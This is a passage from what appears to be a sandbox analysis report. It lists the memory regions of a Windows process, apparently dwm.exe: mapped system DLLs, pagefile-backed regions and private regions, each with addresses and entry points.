start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4971 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4972 start_va = 0x7fef6e60000 end_va = 0x7fef6e86fff monitored = 0 entry_point = 0x7fef6e67254 region_type = mapped_file name = "dwmredir.dll" filename = "\\Windows\\System32\\dwmredir.dll" (normalized: "c:\\windows\\system32\\dwmredir.dll") Region: id = 4974 start_va = 0x7fef6cc0000 end_va = 0x7fef6e51fff monitored = 0 entry_point = 0x7fef6d1700c region_type = mapped_file name = "dwmcore.dll" filename = "\\Windows\\System32\\dwmcore.dll" (normalized: "c:\\windows\\system32\\dwmcore.dll") Region: id = 4975 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4976 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4977 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4978 start_va = 0x7fefbb30000 end_va = 0x7fefbc59fff monitored = 0 entry_point = 0x7fefbb33810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 4979 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4980 start_va = 0x7fef6c80000 end_va = 0x7fef6cb3fff monitored = 0 entry_point = 0x7fef6ca7cac region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 4996 start_va = 0x7fef6a50000 end_va = 0x7fef6aa4fff monitored = 0 entry_point = 0x7fef6a86b20 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 5025 start_va = 0x7fef9310000 end_va = 0x7fef93b6fff monitored = 0 entry_point = 0x7fef932050c region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 5026 start_va = 0x7fefca80000 end_va = 0x7fefca8bfff monitored = 0 entry_point = 0x7fefca81064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 5027 start_va = 0x7fefbca0000 end_va = 0x7fefbcb7fff monitored = 0 entry_point = 0x7fefbca1130 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 5028 start_va = 0x77b30000 end_va = 0x77b36fff monitored = 0 entry_point = 0x77b3106c region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 5029 start_va = 0x290000 end_va = 0x417fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 5030 start_va = 0x420000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 5031 start_va = 0x5b0000 end_va = 0x19affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 5032 start_va = 0x20000 end_va = 0x24fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dwm.exe.mui" filename = "\\Windows\\System32\\en-US\\dwm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\dwm.exe.mui") Region: id = 5033 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 5034 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 5035 start_va = 0x19b0000 end_va = 0x19dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019b0000" filename = "" Region: id = 5036 start_va = 0x19e0000 end_va = 0x1adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 5037 start_va = 0x1ae0000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Thread: id = 554 os_tid = 0x708